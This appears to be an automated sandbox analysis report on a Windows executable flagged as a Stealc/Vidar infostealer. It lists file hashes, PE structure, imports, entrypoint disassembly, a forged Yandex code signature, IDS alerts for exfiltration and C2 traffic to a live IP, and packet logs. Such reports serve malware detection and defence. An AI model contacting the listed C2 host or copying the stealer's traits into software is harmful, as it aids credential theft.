                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                    Chrome Cache Entry: 452

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):5162
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                    MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                    SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                    SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                    SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                    Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.968633951628565
                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                    File name:JA7cOAGHym.exe
                                                                                                                                                                                                                                                                                    File size:1'199'374 bytes
                                                                                                                                                                                                                                                                                    MD5:6e90f0e42285206dce01ffbbd748b081
                                                                                                                                                                                                                                                                                    SHA1:553136becab0e4000f4a47b68d732c2e921cbdc9
                                                                                                                                                                                                                                                                                    SHA256:9b2f6d11a8ffb4d7124fe6ce8ace1672070ee668759900130100d81bc5378dc2
                                                                                                                                                                                                                                                                                    SHA512:61e2596319cc7578b534be41b6223cb5b430a0d1fbd83c490844b45a14bc5105a0c85307da92028eacd1812a89547c503693702228745981d271a4560d40e115
                                                                                                                                                                                                                                                                                    SSDEEP:24576:vDw2rbC8+Cg4XrskXwuEeSM/o60vFApfYR/S/x04Pp6alqXE:bY8+aBgRM/2vFafYpS5ZFlK
                                                                                                                                                                                                                                                                                    TLSH:204523ABC5BD2932FBE117F555B9D902283191931E74822ECF81E88C3E10EA5CD25B77
                                                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                                                                    Icon Hash:3245e1c1e97afcdb

                                                                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                                                    Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                    Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                    Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                                                                                    Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                                                                                    • 20/03/2024 10:23:35 21/03/2026 10:23:35
                                                                                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                                                                                    • CN=YANDEX LLC, O=YANDEX LLC, STREET="Lev Tolstoy street, 16", L=Moscow, S=Moscow, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Moscow, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1027700229193, OID.2.5.4.15=Private Organization
                                                                                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                                                                                    Thumbprint MD5:9906E73CDAF5570B04FDE09A4BCB74A9
                                                                                                                                                                                                                                                                                    Thumbprint SHA-1:46E2F09D295573BB09DACC6B209B142C244A30D6
                                                                                                                                                                                                                                                                                    Thumbprint SHA-256:6E4B1A3C72EF08F8311CF4F596DE8CCA679D06C51A87E1C5714F8DECB84BCB37
                                                                                                                                                                                                                                                                                    Serial:6F126C9CC287DE458CE890F6

                                                                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                                                                    xor ebp, ebp
                                                                                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                                                                                    mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                    mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                    mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                    call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                                                                                                                    call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                    call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                                                                                                                    mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                    call 00007F0B64D5314Bh
                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                    push 000002B4h
                                                                                                                                                                                                                                                                                    mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                    lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                    push 0040A264h
                                                                                                                                                                                                                                                                                    call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                    push 0040A24Ch
                                                                                                                                                                                                                                                                                    push 00476AA0h
                                                                                                                                                                                                                                                                                    call 00007F0B64D52E2Dh
                                                                                                                                                                                                                                                                                    call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                    mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                                                                    call 00007F0B64D52E1Bh
                                                                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                                                                    call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                    cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                    mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                    mov eax, edi
                                                                                                                                                                                                                                                                                    jne 00007F0B64D5071Ah
                                                                                                                                                                                                                                                                                    push 00000022h
                                                                                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                                                                                    mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                    call 00007F0B64D52AF1h
                                                                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                                                                    call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                                                                                                    mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                    jmp 00007F0B64D507A3h
                                                                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                                                                    pop ebx
                                                                                                                                                                                                                                                                                    cmp ax, bx
                                                                                                                                                                                                                                                                                    jne 00007F0B64D5071Ah
                                                                                                                                                                                                                                                                                    add esi, 02h
                                                                                                                                                                                                                                                                                    cmp word ptr [esi], bx

                                                                                                                                                                                                                                                                                    Rich Headers

                                                                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                    • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                    • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                    • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                                                    Data Directories

                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x5342e.rsrc
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x1221d60x2b38.rsrc
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                    Sections

                                                                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                    .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                    .rsrc0x1000000x5342e0x53600f53548c2f4090dead20a79f7c67f6ac1False0.9873442185157422data7.920350796668945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                    .reloc0x1540000xfd60x10006949dc1af917df618b49f48d45e67137False0.56884765625data5.318309025172059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                    Resources

                                                                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                    RT_ICON0x1002680x48567PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9924298418805583
                                                                                                                                                                                                                                                                                    RT_ICON0x1487d00x7843PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9991230064637672
                                                                                                                                                                                                                                                                                    RT_ICON0x1500140x27b8PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0010818253343823
                                                                                                                                                                                                                                                                                    RT_ICON0x1527cc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7934397163120568
                                                                                                                                                                                                                                                                                    RT_DIALOG0x152c340x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                                                                    RT_DIALOG0x152d340x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                                                                    RT_DIALOG0x152e500x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                                                                    RT_GROUP_ICON0x152eb00x3edataEnglishUnited States0.8387096774193549
                                                                                                                                                                                                                                                                                    RT_VERSION0x152ef00x268MS Windows COFF Motorola 68000 object fileEnglishUnited States0.5016233766233766
                                                                                                                                                                                                                                                                                    RT_MANIFEST0x1531580x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                                                                                                                                                                                                                                                                    Imports

                                                                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                                                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                                                                                                                                                                                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                                                                                                                                                                                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                                                                                                                                                                                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                                                                                                                                                                                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                                                                                                                                                                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                                                                                                                                                                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                                                                                                                                                                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                                    2024-12-27T14:46:47.093401+01002859378ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M21192.168.2.549772116.203.8.178443TCP
                                                                                                                                                                                                                                                                                    2024-12-27T14:46:49.516195+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M11192.168.2.549778116.203.8.178443TCP
                                                                                                                                                                                                                                                                                    2024-12-27T14:46:51.853531+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.8.178443192.168.2.549784TCP
                                                                                                                                                                                                                                                                                    2024-12-27T14:46:54.194581+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.8.178443192.168.2.549790TCP

                                                                                                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:45:55.980565071 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:45:55.982656956 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:45:56.089953899 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:05.589894056 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:05.589901924 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:05.699321032 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:08.128330946 CET4434970623.1.237.91192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:08.128426075 CET49706443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.701082945 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.701180935 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.701272964 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.712657928 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:39.712711096 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.169094086 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.169241905 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.224148035 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.224205017 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.224457026 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.226560116 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.228786945 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.271353960 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.734952927 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.734977961 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.735018969 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.735033035 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.735042095 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.735109091 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.735135078 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.737207890 CET49760443192.168.2.5149.154.167.99
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:41.737246037 CET44349760149.154.167.99192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.047739983 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.047777891 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.047868967 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.048141003 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:42.048154116 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.976526976 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.976610899 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.982250929 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.982258081 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.982516050 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.982604027 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:43.983124971 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.027335882 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.465019941 CET4970580192.168.2.5104.18.38.233
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.465131998 CET4970480192.168.2.5172.64.149.23
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.465148926 CET4970380192.168.2.5104.18.20.226
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.585314989 CET8049705104.18.38.233192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.585386038 CET4970580192.168.2.5104.18.38.233
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.586020947 CET8049704172.64.149.23192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.586040974 CET8049703104.18.20.226192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.586116076 CET4970380192.168.2.5104.18.20.226
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.586229086 CET4970480192.168.2.5172.64.149.23
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.680963993 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.681036949 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.681039095 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.681101084 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.685209990 CET49766443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.685230017 CET44349766116.203.8.178192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.688149929 CET49772443192.168.2.5116.203.8.178
                                                                                                                                                                                                                                                                                    Dec 27, 2024 14:46:44.688194990 CET44349772116.203.8.178192.168.2.5
